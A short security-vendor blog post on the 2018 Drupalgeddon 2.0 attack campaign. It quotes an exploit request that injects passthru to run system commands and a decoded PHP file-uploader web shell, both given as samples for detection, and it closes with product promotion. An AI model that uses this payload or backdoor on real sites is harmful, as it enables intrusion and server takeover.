Drupalgeddon 2.0: Analyst’s Insight
Activity
Our monitoring systems identified a first-wave malicious campaign on April 12th, 2018, the same day that proof of concept code went public.
The Drupal core security team had earlier released security advisory SA-CORE–2018–002 on the 28th March. We released our blocking and detection rules a few days later meaning that Imunify360 customers were already protected by the time the campaign started.
October saw a new burst of attacks on this vector. Botnets located on thousands of IPs requested access to Drupal-based sites to upload a malicious payload. The chart below shows the activity levels for the past few months.
Recognition
node?q[%23][]=passthru&q[%23type]=markup&q[%23markup]=id;uname -a
Other payloads were seen with base64 encoding in the file sites/default/files/xv.php. Decoded, they look like a common file uploader:
<?php echo "xin0x g4me"; move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']); ?>
MitigationCompared to vendor-specific and free WAF rules available online, our rules are much more difficult to circumvent.
Imunify360 is the best choice for your all-in-one security protection needs.
Oleg Boytsev is an analyst in the Imunify360 Threat Intelligence Group.
